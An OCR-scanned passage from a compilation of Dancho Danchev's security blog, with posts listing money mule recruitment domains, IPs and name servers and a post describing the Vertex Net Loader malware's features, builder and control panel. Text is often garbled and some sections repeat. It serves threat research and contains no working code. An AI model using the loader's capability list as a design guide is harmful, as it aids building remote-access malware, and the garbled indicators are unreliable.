[4]Web Based Botnet Command and Control Kit 2.0 
[5]BlackEnergy DDoS Bot Web Based 


[6]A New DDoS Malware Kit in the Wild 

[7]The Cyber Bot - Web Based Malware 

[8]The Black Sun Bot - Web Based Malware 
[9]Custom DDoS Capabilities Within a Malware 
[10]Botnet on Demand Service 

[11]Loads.cc - DDoS for Hire Service 

[12]Using Market Forces to Disrupt Botnets 
[13]Botnet Communication Platforms 

[14]A Botnet Master's To-Do List 


[15]DDoS on Demand VS DDoS Extortion 
[16]How Does a Botnet with 100k Infected PCs Look Like? 


This post has been reproduced from [17]Dancho Danchev’s blog. Follow him [18]Jon 
Twitter. 


, [ep] [tenet Wagapoe con] 2008/07 [eoding”apyvare- end walvare for hive, ita 
_hutp://adanchev. blogspot con/7008/11/il1- code-nalware~for-financial. neal 

. http: //ddanchev. blogspot . com/2008/01/e-crime-and-socioeconomic-factors. html 
_netp://asanchev. blogspot .con/2002/08/seb-based-botnet~conand-and~ control. tal 
. http: //ddanchev. blogspot . com/2008/02/blackenergy-ddos-bot-web-based-c -html 


ttp://ddanchev. blogspot .com/2007/09/new-ddos-malware-kit-in-wild.htm 


http: //ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_20.htm 


ttp://ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_7672.htm 
ttp://ddanchev. blogspot .com/2007/09/custom-ddos-capabilities-within-malware.htm 


10. http: //ddanchey. blogspot .con/2007/10/botnet~on-denand-service. nt 
| http: //adanchev blogspot. con/2008/09/leadscce-ddos-for-hire- service. Hal 
| http: //adanchev blogspot. con/2008/06/asing-narket~forces-to- disrupt botnets tal 
13, hep: //ddancher. blogspot .con/2007/03 botnet conmunication-platforns. html 


http: //ddanchev. blogspot. com/2008/04/botnet-masters-to-do-list.htm 
http: //ddanchev. blogspot. com/2007/05/ddos-on-demand-vs-ddos- extortion. htm 


. http: //ddanchev. blogspot .com/2008/05/how-does-botnet-with-100k-infected-pcs.html 


17. http://ddanchev.blogspot.com/ 
18. http://twitter.com/danchodanche 
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7.5.4 Keeping Money Mule Recruiters on a Short Leash - Part Seven (2011-05-10 12:41) 
Alternative Art Ltd 


Piitae Aboutthe Company Products Articles Links Contact Us 


What We Do Services Overview About us 


e Search for latest in art work fe are the first choice for artists and buyers a 
artist to market and promote their artina © Negotiate the best possible price 

¢ Submit special buyers requests 

© Provide 100% Guarantee 


Welcome to Alternative Art Ltd Authorization 


Continuing the what has turned into a tradition, the "[1]Keeping Money Mule Recruiters on 
a Short Leash" series, in this post we’ll review currently active money mule recruitment 
sites, and provide vital OSINT data on what is currently acting as the the cornerstone of the 
monetization process that cybercriminals rely on - risk forwarding thanks to money mule 
recruitment for processing of fraudulently obtained funds. 


Description used on the majority of templates: 

"Looking to buy art? Sell art? Alternative Art Ltd is the first choice for artists and buyers 
alike! Alternative Art Ltd is an effective tool for the artist and emerging artist to market and 
promote their art in a professional and inexpensive manner. We will market your art to the 
international community of art buyers. Whether you are looking to buy or sell original art, 
Alternative Art Ltd is the premier art site for those seeking to buy or sell original art online. 


NO COMMISSIONS! Whether you are looking to buy art or sell art, our site is fully opti- 
mized to get results FAST! Alternative Art Ltd is the future of buying and selling original art 
online. Artists who choose to sell their original art will receive maximum marketing exposure. 
For artists, selling your art has never been easier, faster, or more cost-effective. We will help 
you sell your original art DIRECTLY to buyers worldwide with NO COMMISSIONS. Those wishing 
to buy art online are invited to browse our extensive online galleries of original art. Never 
before has it been this easy for a buyer to select high-quality original art online. We update 
daily with new original art from our artist members. 


Alternative Art Ltd offers casual collectors and serious connoisseurs alike an amazing 
collection of original art pieces from the world over. You'll enjoy unparalleled customer care 
from a knowledgeable and friendly staff of experts. For artists, the inconvenience and high 
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costs of traditional galleries are completely eliminated. Our team of experts puts the latest 
technology to work for you, putting your original art in front of millions of potential art buyers!" 


Money mule recruitment domains: 

aimic-groupllic.at - Email: admin@aimic-groupllc.at 
ALTERNATIVEART-LTD.COM 

alternative-art-Itd.net - Email: ibsen@ppmail.ru 

artby-gorup.net - Email: admin@artby-gorup.net 

artby-group.biz - Email: blonde@bz3.ru 

art-marketllc.cc - Email: hear@ppmail.ru - [2]seen here 
artsolveltdco.at - Email: admin@artsolveltd.cc 

aspecs-group.cc - Email: admin@aspecs-group.cc 
ASPECS-GROUP.CC - Email: admin@aspecs-group.cc 
callisto-ltdco.net - Email: admin@callisto-Itdco.net 
collins-group.cc - Email: admin@megatechservicegroup-ltd.cc 
collins-groupusa.com - Email: admin@collins-groupusa.com 
COLLINS-GROUPUSA.COM - Email: admin@collins-groupusa.com 
competitorgroup-Itd.com - Email: trek@cheapbox.ru 
COMPETITOR-UK-GROUP.NET - Email: admin@competitor-uk-group.net 
DERWART-GROURP.AT - Email: admin@derwart-group.at 
derwart-group.com - Email: admin@ephesgroup-llc. biz 
drawmade-group.com - Email: admin@drawmade-group.com 
DURLEY-ARTAU.NET - Email: admin@durley-artau.net 
DURLEY-ART-GROUP.CC - Email: admin@durley-art-group.cc 
ephesgroup-llc.biz - Email: admin@ephesgroup-llc. biz 
EPHES-GROUPLLC.CC - Email: admin@ephes-groupllc.cc 
ephes-groupllic.net - Email: pious@ppmail.ru 

fourthgroup-Itd.cc - Email: rots@cheapbox.ru - [3]seen here 
FOURTH-UKLTD.NET - Email: admin@fourth-ukltd.net 
generalabbrialgroup-ltd.net - Email: admin@generalabbrialgroup-Itd.net 
GENERATION-TEAM.NET - Email: luis@cheapbox.ru 
groupinc-upland.biz - Email: admin@groupinc-upland. biz 
HELBY-GROUPLTD.BIZ - Email: admin@helby-groupltd. biz 
HELBY-GROUP-LTD.CC - Email: packet@bz3.ru 

koertig-gmbh.com - Email: usieeobq0604@yahoo.com 
kresko-group.biz - Email: admin@Kresko-group. biz 
LILAC-ANTIQUE.CC - Email: admin@lilac-antique.cc 
MASTERPIECE-GROUP.CC - Email: poop@ca4.ru 
MASTERPIECE-GROUP.ORG - Email: admin@masterpiece-group.org 
megatechservicegroup-Itd.cc - Email: admin@megatechservicegroup-lItd.cc 
MEGATECHSERVICE-GROUP-LTD.COM - Email: admin@collins-groupusa.com 
millennial-maingrop.net - Email: mock@free-id.ru 
mitissanservice-group-Itd.cc - Email: berra@cutemail.org 
mitissanservicegroup-Itd.com - Email: alibi@mailae.com 
neoline-groupco.cc - Email: admin@neoline-groupco.cc 
neoline-lic.net - Email: admin@neoline-lic.net 

qead-grouplic.net 

QEAD-LLC.BIZ - Email: admin@qead-llc. biz 
RICHMOND-ART-GROUP.COM - Email: binary@ca4.ru 
RICHMOND-ART-UK.BIZ - Email: admin@richmond-art-uk.biz 


3730 


sevg-groupnet.com - Email: belle@ca4.ru 
SEVG-GROUPNET.COM - Email: belle@ca4.ru 

sevg-incgr.net - Email: admin@sevg-incgr.net 
SQUIT-GROUP-LLC.BIZ - Email: swept@ca4.ru 
SQUITGROUP-LLC.NET - Email: admin@squitgroup-llc.net 
targetmarketgroup-llc.cc - Email: admin@targetmarketgroup-llc.cc 
targetmarket-groupllc.net 

tazprogltd-us.com - Email: admin@tazprogltd-us.com 
TONSLEY-ART.COM - Email: pagan@ppmail.ru 
tonsley-group-uk.net - Email: admin@tonsley-group-uk.net 
WEST-VIEW-ART.CC - Email: knees@free-id.ru 
westview-art.net - Email: admin@westview-art.net 


aimic-grouplic.cc 
artby-gorup.net 

atlant-usainc.net 
creatence-grouplic.cc 
diligence-groupine.cc 
mx.aimic-grouplic.ce 

mx artby-gorup.net 
mx.atlant-usaine.net 


mx.callisto-Itdco.net 
pre 


» » 


98 ‘us 220,118 
mxcollins-group.ce 
mx.delt-group.net 
mx.mallow-group.cc 
mxmenzel-group.ty 
mx.neoline-groupco.cc 
mxnrgy-co.net 
mx. sevg-inegenet 


sevg-inegrnet 


98.141.220.0/24 ———————“S-» s29713 


98-141-220-118 reliablehostingserices.net 
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Name servers of notice: 
NS1.USDENNS.SU - 217.23.15.136 
NS2.DNSUS.SU - 87.118.81.7 
NS3.NAMEUSNS.SU - 84.19.161.10 
ns1.pidnsku.org - 86.55.210.23 
ns3.uslcopy.ws - 95.64.9.101 
ns2.uslcopy.at - 78.46.105.205 
ns2.stelsgid.net - 78.46.105.205 
nsl.usolomio.cc - 86.55.210.23 
ns2.usetmegold.su - 78.46.105.205 
ns3.usiami.su - 78.46.105.205 
nsl.,ukansnami.com - 78.46.105.205 
ns3.uknamo.com - 66.199.236.116 
ns2.dnsukrect.com - 78.46.105.205 


callisto-ltdco,net 
drawmade-group.com 
ephes-groupllc.net 
targetmarketgroup-lic.cc 
artby-gorup.net 
tazprogltd-us.com 
groupinc-upland. biz 
neoline-Ilc. net 98.141,.220.115 
DER WART-GROUP, AT 98,141.220,114 
ALTERNATIVEART-LTD,.COM 86,.55.210.5 
collins-groupusa,com 78,.46,105,205 
COLLINS-GROUPUS4,COM 78.46,105,205 
derwart-group.com 

f-ARTAU. NET 
DURLEY-ART-GROUP,.CC 


ephesgroup-llc. biz 
OUPLLC.CC 


group. biz 
MASTERPIECE-GROUP,.CC 
QEAD-LLC, BIZ 
SEVG-GROUPNET.COM 
SQUITGROUP-LLC.NET 


Currently active and responding money mule recruitment domains, residing within AS42708, 
PORTLANE Network; AS29713, INTERPLEXINC Interplex LLC.; AS24940, HETZNER-AS Hetzner 
Online AG RZ: 

alternative-art-Itd.net - 193.105.134.234 

westview-art.net - 193.105.134.233 
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RICHMOND-ART-UK.BIZ - 193.105.134.232 
fourthgroup-lItd.cc - 193.105.134.230 
artby-group.biz - 98.141.220.118 
collins-group.cc - 98.141.220.118 
aspecs-group.cc - 98.141.220.117 
ASPECS-GROUP.CC - 98.141.220.117 
callisto-Itdco.net - 98.141.220.117 
drawmade-group.com - 98.141.220.117 
ephes-groupllic.net - 98.141.220.117 
targetmarketgroup-lIc.cc - 98.141.220.117 
artby-gorup.net - 98.141.220.116 
tazprogltd-us.com - 98.141.220.116 
groupinc-upland.biz - 98.141.220.115 
neoline-lic.net - 98.141.220.115 
DERWART-GROURP.AT - 98.141.220.114 
ALTERNATIVEART-LTD.COM - 86.55.210.5 
collins-groupusa.com - 78.46.105.205 
COLLINS-GROUPUSA.COM - 78.46.105.205 
derwart-group.com - 78.46.105.205 
DURLEY-ARTAU.NET - 78.46.105.205 
DURLEY-ART-GROUP.CC - 78.46.105.205 
ephesgroup-lic.biz - 78.46.105.205 
EPHES-GROUPLLC.CC - 78.46.105.205 
kresko-group.biz - 78.46.105.205 
MASTERPIECE-GROUP.CC - 78.46.105.205 
QEAD-LLC.BIZ - 78.46.105.205 
SEVG-GROUPNET.COM - 78.46.105.205 
SQUITGROUP-LLC.NET - 78.46.105.205 


Psychological evaluation tests found within AS29713, basically every domain name has 
its associated binary: 
aimicgroupllc.exe 
artbygorup.exe 
aspecsgroup.exe 
atlantgroupmain.exe 
collinsgroupusa.exe 
createncegroupllc.exe 
derwartgroup.exe 
dogogroup.exe 
ephesgroupllic.exe 
megatechservicegroupltd.exe 
millennialartco.exe 
sevggroupnet.exe 
stilegroupllc.exe 
vintagegroupinc.exe 


Monitoring of money mule recruitment campaigns is ongoing. 


Related posts: 
[4]Keeping Money Mule Recruiters on a Short Leash - Part Six 
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[5]Keeping Money Mule Recruiters on a Short Leash - Part Five 
[6]The DNS Infrastructure of the Money Mule Recruitment Ecosystem 
[7]Keeping Money Mule Recruiters on a Short Leash - Part Four 
[8]Money Mule Recruitment Campaign Serving Client-Side Exploits 
[9]Keeping Money Mule Recruiters on a Short Leash - Part Three 
[10]Money Mule Recruiters on Yahoo!’s Web Hosting 
[11]Dissecting an Ongoing Money Mule Recruitment Campaign 
[12]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[13]Keeping Reshipping Mule Recruiters on a Short Leash 
[14]Keeping Money Mule Recruiters on a Short Leash 
[15]Standardizing the Money Mule Recruitment Process 

[16]Inside a Money Laundering Group’s Spamming Operations 
[17]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[18]Money Mules Syndicate Actively Recruiting Since 2002 


This post has been reproduced from [19]Dancho Danchev’s blog. 
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7.5.5 Keeping Money Mule Recruiters on a Short Leash - Part Eight - Historical OSINT 
(2011-05-25 13:18) 


OREGON LTD 


Home Aboutthe Company Products Articles Links Contact Us 


New Arrivals 


What We Do Services Overview About us 


ovide an effective tool for the artist and eme 9 © Search for latest in art work 
¢ Nego®ate the best possible price 
© Submit special buyers requests uyer ur goal Is to enable artists to sell origina 
e Provide 100% Guarantee 


Welcome to OREGON LTD Authorization 


With money mule recruitment scams continuing to represent an inseparable part of the cy- 
bercrime ecosystem, in this post I'll summarize the findings from an assessment | conducted 
on currently active mule recruitment scams over a month ago. As always, the historical 
OSINT offered is invaluable in case-building practices in particular a very well segmented 
group of mule recruiters using identical templates which they’ve purchased from a vendor of 
standardized mule recruitment templates. 


Domains known to have been participating in money mule recruitment campaigns, cur- 
rently offine: 
allston-groupsec.cc 
atca-inc.com 
atcanetworks.net 
BANDSGROUP-INC.NET 
BANDSGROUPNET.CC 
BANDS-GROUPSVC.COM 
BANDS-INC.COM 
CNLGROUP-INC.CC 
CNLGROUPNET.NET 
CNL-GROUPSVC.COM 
CNL-INC.COM 
evolving-inc.com 
evolvingsysinc.net 
galleogroupnet.net 
galleo-inc.com 
GIANT-GROUPCO.NET 
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GIANTGROUPINC.COM 

GIANT-GROUPINC.COM 

GIANT-GROUPNET.CC 

HOSTGROUPINC.COM 

HOSTGROUP-INC.COM 

HOSTGROUPNET.CC 

HOST-GROUPSVC.NET 

ICT-GROUPCO.COM 

ICTGROUPINC.COM 

ICTGROUPNET.CC 

ICT-GROUPSVC.NET 

IMPERIALGROUPCO.COM 

IMPERIAL-GROUPINC.COM 

IMPERIAL-GROUPSVC.NET 

INFOTECH-GROUPCO.NET 

INFOTECH-GROUPINC.COM 

infotechgroup-inc.com 

jvc-inc.com 

magnet-groupinc.cc 

netmarket-inc.com 

netmarkettech.net 

NOVARIS-GROUPLLC.TW 

NOVARISGROUPMAIN.TW 

NOVARIS-GROUPORG.CC 

PERSEUS-GROUPFINE.TW 

PERSEUS-GROUPINC.TW 

PERSEUSGROUPLLC.CC 

USIGROUPINC.COM 

USIGROUP-INC.COM 

USI-GROUPINC.NET 

USIGROUPNET.CC 

VITAL-GROUPCO.CC 

VITAL-GROUPCO.TW 

VITAL-GROUPINC.TW 

developgroupinc.net - 69.50.199.209 - Email: slows@5mx.ru 
develop-inc.com - 69.50.199.209 - Email: etude@qx8.ru 
mercygroupnet.net - 69.50.198.218 - Email: bowie@bigmailbox.ru 
mercy-inc.com - 69.50.198.221 - Email: spoout@freenetbox.ru 
solarisgroupinc.com - 69.50.199.209 - Email: slows@5mx.ru 
solarisgroupnet.net - 69.50.198.197 - Email: sharp@maillife.ru 
jvc-inc.com - 69.50.198.210 - Email: etude@qx8.ru 
jvcgroupnet.net - 69.50.198.221 - Email: spout@freenetbox.ru 


Name servers of notice, historical OSINT for the responding IPs provided: 
ns1.kalipso19.cc - 208.110.80.34 - Email: tarts@freenetbox.ru 
ns2.kalipsol19.cc - 64.85.169.70 

ns3.kalipsol19.cc - 173.208.132.42 


nsl.mamacholi.net - 208.110.80.35 - Email: excess@bigmailbox.ru 
ns2.mamacholi.net - 64.85.169.71 
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ns3.mamacholi.net - 173.208.132.43 


ns1.rjevski.com - 208.110.80.34 - Email: low@bigmailbox.ru 
ns2.rjevski.com - 64.85.169.70 
ns3.rjevski.com - 173.208.132.42 


ns1.runlesrun.cc - 208.110.80.37 - Email: frost@bigmailbox.ru 
ns2.runlesrun.cc - 64.85.169.73 
ns3.runlesrun.cc - 173.208.132.45 


ns1.skotinko.net - 208.110.80.38 - Email: info@dnregistrar.ru 
ns2.skotinko.net - 64.85.169.74 
ns3.skotinko.net - 173.208.132.46 


ns1,solojumper.com - 208.110.80.36 - Email: crime@bigmailbox.ru 
ns2.solojumper.com - 64.85.169.72 
ns3.solojumper.com - 173.208.132.44 


Monitoring of money mule recruitment campaigns is ongoing. 


Related posts: 

[1]Keeping Money Mule Recruiters on a Short Leash - Part Seven 
[2]Keeping Money Mule Recruiters on a Short Leash - Part Six 
[3]Keeping Money Mule Recruiters on a Short Leash - Part Five 
[4]The DNS Infrastructure of the Money Mule Recruitment Ecosystem 
[5]Keeping Money Mule Recruiters on a Short Leash - Part Four 
[6]Money Mule Recruitment Campaign Serving Client-Side Exploits 
[7]Keeping Money Mule Recruiters on a Short Leash - Part Three 
[8]Money Mule Recruiters on Yahoo!’s Web Hosting 

[9]Dissecting an Ongoing Money Mule Recruitment Campaign 
[10]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[11]Keeping Reshipping Mule Recruiters on a Short Leash 
[12]Keeping Money Mule Recruiters on a Short Leash 
[13]Standardizing the Money Mule Recruitment Process 

[14]Inside a Money Laundering Group’s Spamming Operations 
[15]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[16]Money Mules Syndicate Actively Recruiting Since 2002 


This post has been reproduced from [17]Dancho Danchev’s blog. 
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. http: //ddanchev.blogspot .com/2009/10/standardizing-money-mule-recruitment .htm 


. http: //ddanchev.blogspot .com/2009/05/inside-money-laundering-groups- spamming .htm 
. http: //ddanchev. blogspot. com/2008/07/money-mule-recruiters-use-asproxs-fast .htm 


16. http: //ddanchev.blogspot .com/2008/10/money-mules-syndicate-actively.htm 
17. http: //ddanchev.blogspot.com/ 


7.5.6 Keeping Money Mule Recruiters on a Short Leash - Part Eight - Historical OSINT 
(2011-05-25 13:18) 


OREGON LTD 


Home About the Company Products Articles Links 


Bape 
Ber idee aes 


New Arrivals 


What We Do Services Overview About us 


Provide an effective tool for the artist and emerging ¢ Search for latest in art work @ are the first choice for artists and buys 
1d promote thelr art in a © Nego®ate the best possible price 
onal and inexpensive manne © Submit special buyers requests er Jf goal is to enable artists to sell orginal 
« Provide 100% Guarantee 


Welcome to OREGON LTD Authorization 


With money mule recruitment scams continuing to represent an inseparable part of the 
cybercrime ecosystem, in this post I’ll summarize the findings from an assessment | con- 
ducted on currently active mule recruitment scams over a month ago. As always, the 
historical OSINT offered is invaluable in case-building practices in particular a very well 
segmented group of mule recruiters using identical templates which they’ve purchased from 
a vendor of standardized mule recruitment templates. 


Domains known to have been participating in money mule recruitment campaigns, cur- 
rently offine: 


3738 


allston-groupsec.cc 
atca-inc.com 
atcanetworks.net 
BANDSGROUP-INC.NET 
BANDSGROUPNET.CC 
BANDS-GROUPSVC.COM 
BANDS-INC.COM 
CNLGROUP-INC.CC 
CNLGROUPNET.NET 
CNL-GROUPSVC.COM 
CNL-INC.COM 
evolving-inc.com 
evolvingsysinc.net 
galleogroupnet.net 
galleo-inc.com 
GIANT-GROUPCO.NET 
GIANTGROUPINC.COM 
GIANT-GROUPINC.COM 
GIANT-GROUPNET.CC 
HOSTGROUPINC.COM 
HOSTGROUP-INC.COM 
HOSTGROUPNET.CC 
HOST-GROUPSVC.NET 
ICT-GROUPCO.COM 


ICTGROUPINC.COM 
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ICTGROUPNET.CC 
ICT-GROUPSVC.NET 
IMPERIALGROUPCO.COM 
IMPERIAL-GROUPINC.COM 
IMPERIAL-GROUPSVC.NET 
INFOTECH-GROUPCO.NET 
INFOTECH-GROUPINC.COM 
infotechgroup-inc.com 
jvc-inc.com 
magnet-groupinc.cc 
netmarket-inc.com 
netmarkettech.net 
NOVARIS-GROUPLLC.TW 
NOVARISGROUPMAIN.TW 
NOVARIS-GROUPORG.CC 
PERSEUS-GROUPFINE.TW 
PERSEUS-GROUPINC.TW 
PERSEUSGROUPLLC.CC 
USIGROUPINC.COM 
USIGROUP-INC.COM 
USI-GROUPINC.NET 
USIGROUPNET.CC 
VITAL-GROUPCO.CC 
VITAL-GROUPCO.TW 


VITAL-GROUPINC.TW 
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developgroupinc.net - 69.50.199.209 - Email: slows@5mx.ru 
develop-inc.com - 69.50.199.209 - Email: etude@qx8.ru 
mercygroupnet.net - 69.50.198.218 - Email: bowie@bigmailbox.ru 
mercy-inc.com - 69.50.198.221 - Email: spout@freenetbox.ru 
solarisgroupinc.com - 69.50.199.209 - Email: slows@5mx.ru 
solarisgroupnet.net - 69.50.198.197 - Email: sharpo@maillife.ru 
jvc-inc.com - 69.50.198.210 - Email: etude@qx8.ru 


jvcgroupnet.net - 69.50.198.221 - Email: spout@freenetbox.ru 


Name servers of notice, historical OSINT for the responding IPs provided: 
ns1.kalipso19.cc - 208.110.80.34 - Email: tarts@freenetbox.ru 
ns2.kalipso19.cc - 64.85.169.70 


ns3.kalipsol19.cc - 173.208.132.42 


nsl.mamacholi.net - 208.110.80.35 - Email: excess@bigmailbox.ru 
ns2.mamacholi.net - 64.85.169.71 


ns3.mamacholi.net - 173.208.132.43 


ns1.rjevski.com - 208.110.80.34 - Email: low@bigmailbox.ru 
ns2.rjevski.com - 64.85.169.70 


ns3.rjevski.com - 173.208.132.42 


ns1.runlesrun.cc - 208.110.80.37 - Email: frost@bigmailbox.ru 
ns2.runlesrun.cc - 64.85.169.73 


ns3.runlesrun.cc - 173.208.132.45 
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ns1.skotinko.net - 208.110.80.38 - Email: info@dnregistrar.ru 
ns2.skotinko.net - 64.85.169.74 


ns3.skotinko.net - 173.208.132.46 


nsl.solojumper.com - 208.110.80.36 - Email: crime@bigmailbox.ru 
ns2.solojumper.com - 64.85.169.72 


ns3.solojumper.com - 173.208.132.44 


Monitoring of money mule recruitment campaigns is ongoing. 


Related posts: 

[1]Keeping Money Mule Recruiters on a Short Leash - Part Seven 
[2]Keeping Money Mule Recruiters on a Short Leash - Part Six 
[3]Keeping Money Mule Recruiters on a Short Leash - Part Five 
[4]The DNS Infrastructure of the Money Mule Recruitment Ecosystem 
[5]Keeping Money Mule Recruiters on a Short Leash - Part Four 
[6]Money Mule Recruitment Campaign Serving Client-Side Exploits 
[7]Keeping Money Mule Recruiters on a Short Leash - Part Three 
[8]Money Mule Recruiters on Yahoo!’s Web Hosting 

[9]Dissecting an Ongoing Money Mule Recruitment Campaign 
[10]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[11]Keeping Reshipping Mule Recruiters on a Short Leash 
[12]Keeping Money Mule Recruiters on a Short Leash 


[13]Standardizing the Money Mule Recruitment Process 
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[14]Inside a Money Laundering Group’s Spamming Operations 
[15]Money Mule Recruiters use ASProx’s Fast Fluxing Services 


[16]Money Mules Syndicate Actively Recruiting Since 2002 


This post has been reproduced from [17]Dancho Danchev’s blog. 


http: //ddanchev. blogspot .com/2011/05/keeping-money-mule-recruiters-on-short .html 
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. http: //ddanchev.blogspot .com/2011/01/keeping-money-mule-recruiters-on-short .html 
http: //ddanchev. blogspot .com/2010/04/dns- infrastructure-of-money-mule. html 

. http: //ddanchev.blogspot .com/2010/04/keeping-money-mule-recruiters-on-short .html 
. http: //ddanchev. blogspot .com/2010/03/money-mule-recruitment-campaign-serving. html 
http: //ddanchev. blogspot .com/2010/03/keeping-money-mule-recruiters-on-short .html 
. http: //ddanchev. blogspot .com/2010/03/money-mule-recruiters-on-yahoos-web. html 


. http: //ddanchev. blogspot .com/2010/02/dissecting-ongoing-money-mule. html 
. http://ddanchev. blogspot .com/2010/02/keeping-money-mule-recruiters-on-short. html 


PR 
rH Oo 


. http://ddanchev. blogspot .com/2009/12/keeping-reshipping-mule-recruiters-on.html 


H 
N 


. http://ddanchev. blogspot .com/2009/11/keeping-money-mule-recruiters-on-short. html 


py 
WW 


. http://ddanchev. blogspot .com/2009/10/standardizing-money-mule-recruitment . html 


ray 
nS 


. http://ddanchev. blogspot .com/2009/05/inside-money- laundering- groups- spamming. html 


H 
ul 


. http://ddanchev. blogspot .com/2008/07/money-mule-recruiters-use-asproxs-fast. html 


H 
oO 


. http://ddanchev. blogspot .com/2008/10/money-mules-syndicate-actively. html 
. http://ddanchev. blogspot .com/ 


i 
NX 


7.5.7 A Peek Inside the Vertex Net Loader (2011-05-26 16:34) 
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It appears that the author of the of the DarkComet RAT has been keeping himself rather busy. 


In early-stage development (currently in BETA), the Vertex Net Loader is your typical 
web-based command and control malware loader, worth keeping an eye on. 


More details: 

Info on the loader: 

This is the small program that will send/retrieve info from/to the web panel , it is like the 
server part of a RAT. The loader is coded in C++. Size unpacked is 100kb , compressed is 
very small and still stable. | choose C++ as the language for this project cause i code C++ 
since a long time but i never release some security soft, so as a friend said it is a shame to 
have a knowledge in C++ and don’t use it instead of Delphi all the time. Also C++ is faster 
and more stable than any other language. 


Features of the loader: 

- Send message box 

- Execute any kind of commands 

- close loader process 

- Download files and execute them 

- Get the process list 

- Get the modules list from PID 

- Set the keylogger status ON/OFF 

- Retrieve the keylogger logs 

- Read the file content and retrieve it 
- Uninstall the loader 

- Httpflood same technologies as i used for DarkComet that is very powerfull 
- Remote shell 

- Visit any webpage 


Upcoming features: 

- FWB 

- More commands 

- Panel Installer 

- More possibilities in the webpanel 
- User manager in the panel 

- Plugins support 

- and more. 
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VertexNet Loader - Builder 


Web server settings 


Root website url: www.yoursite.com 
Http port (80) : 80 


Web site path : NertexNet/ 


Loader settings 


Process mutex: VN_MUTEX16 


~ | Install loader to startup 


Keyname: vnet (7) 


Drop to: §%DEFDRIVE% + dropped.exe 


°%DEFDRIVE% 
%APPDATA% 
%L APPDAT% 
Stop this music i %PROGFILES% 

°% TEMP % 

V o%STARTUPDIR % 
®%USERDIR% 
%CUSTOM% 


fed by DarkCoderSc. 
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+ ‘DerkComet-Qat (® 


+ ‘DarkComet-RAT (IRs 
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) VertexNet 1b 


€ CS O localhost/pan 


VertexNet 


Users list:. Settings: .Commands:. .:About:. .:Logoff:. 


4+ Users board 


2 IP (Remote Addr) Computer name 
GE] @ i 127.0.0,.1/192.1 
Page 


Country idle Version T 5S 


French [Fra és v1.06 B&O 


) VertexNet 1b 


CS Olocathost 


VertexNet 


Users list:. .<Settings:. .Commands:. .:Abou' -Logoff:. 


®& Panel settings 


wax urraitens or soce : 


Show offline loaders Oves @No 


Change 


Change password 


Save moddcations 
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) VertexNet WO.1b 


|S Olocathost/panel/indexphp?page 


Monitoring of Vertex Net Loader’s development is ongoing. 


Related posts: 

[1]A Peek Inside a New DDoS Bot - "Snap" 
[2]Coding Spyware and Malware for Hire 

[3]Will Code Malware for Financial Incentives 
[4]E-crime and Socioeconomic Factors 

[5]Web Based Botnet Command and Control Kit 2.0 
[6]BlackEnergy DDoS Bot Web Based 


[7]A New DDoS Malware Kit in the Wild 

[8]The Cyber Bot - Web Based Malware 

[9]The Black Sun Bot - Web Based Malware 
[10]Custom DDoS Capabilities Within a Malware 
[11]Botnet on Demand Service 

[12]Loads.cc - DDoS for Hire Service 

[13]Using Market Forces to Disrupt Botnets 
[14]Botnet Communication Platforms 

[15]A Botnet Master’s To-Do List 


[16]DDoS on Demand VS DDoS Extortion 
[17]How Does a Botnet with 100k Infected PCs Look Like? 


This post has been reproduced from [18]Dancho Danchev’s blog. Follow him [19]Jon 
Twitter. 


3. http://ddanchev. blogspot. com/2008/11/will-code-malware-for-financial .html 
4. http://ddanchev. blogspot .com/2008/01/e-crime-and-socioeconomic-factors.html 
5. http: //ddanchev.blogspot .com/2008/08/web- based-botnet-command-and-control .html1 
6. http: //ddanchev. blogspot . com/2008/02/blackenergy-ddos-bot-web-based-c. html 
7. http://ddanchev. blogspot . com/2007/09/new- ddos-malware-kit-in-wild.html 

8. http: //ddanchev. blogspot. com/2007/04/shots-from-malicious-wild-west-sample_20.html 
9. http: //ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_7672.html 
10. http://ddanchev. blogspot .com/2007/09/custom-ddos-capabilities-within-malware.html 
11. http://ddanchev. blogspot .com/2007/10/botnet- on-demand-service.html 

12. http://ddanchev. blogspot .com/2008/03/loadsccs-ddos-for-hire-service. html 

13. http://ddanchev. blogspot .com/2008/06/using-market-forces-to-disrupt-botnets.html 
14. http://ddanchev. blogspot .com/2007/03/botnet- communication-platforms. html 

15. http://ddanchev. blogspot .com/2008/04/botnet-masters-to-do-list. html 

16. http://ddanchev. blogspot .com/2007/05/ddos- on-demand-vs-ddos-extortion.html 

17. http://ddanchev. blogspot .com/2008/05/how-does-botnet-with-100k-infected-pcs.html 
18. http://ddanchev. blogspot .com/ 

19. http://twitter .com/danchodanchev 


7.5.8 A Peek Inside the Vertex Net Loader (2011-05-26 16:34) 


It appears that the author of the of the DarkComet RAT has been keeping himself rather 
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busy. 


In early-stage development (currently in BETA), the Vertex Net Loader is your typical 
web-based command and control malware loader, worth keeping an eye on. 


More details: 

Info on the loader: 

This is the small program that will send/retrieve info from/to the web panel , it is like 
the server part of a RAT. The loader is coded in C++. Size unpacked is 100kb , compressed 
is very small and still stable. | choose C++ as the language for this project cause i code C++ 
since a long time but i never release some security soft, so as a friend said it is a shame to 


have a knowledge in C++ and don’t use it instead of Delphi all the time. Also C++ is faster 
and more stable than any other language. 


Features of the loader: 

- Send message box 

- Execute any kind of commands 

- close loader process 

- Download files and execute them 

- Get the process list 

- Get the modules list from PID 

- Set the keylogger status ON/OFF 

- Retrieve the keylogger logs 

- Read the file content and retrieve it 
- Uninstall the loader 

- Httpflood same technologies as i used for DarkComet that is very powerfull 
- Remote shell 


- Visit any webpage 
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Upcoming features: 

- FWB 

- More commands 

- Panel Installer 

- More possibilities in the webpanel 
- User manager in the panel 

- Plugins support 


- and more. 


© VertexNet Loader - Builder 
Web server settings 
Root website url: www.yoursite.com 
Http port (80) : 80 


Web site path : NertexNet/ 


Loader settings 


Process mutex: VN_MUTEX16 


~| Install loader to startup 
Keyname: vnet 


Drop to: § %DEFDRIVE% dropped.exe 


%DEFDRIVE% 
%APPDATA% 
YLAPPDAT Yo 
Stop this music i %PROGFILES% 
YeTEMP % 


V o%STARTUPDIR % 
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VertexNet vO.1b 


© O localhost 


sLogoff:. 
4+ Users board 
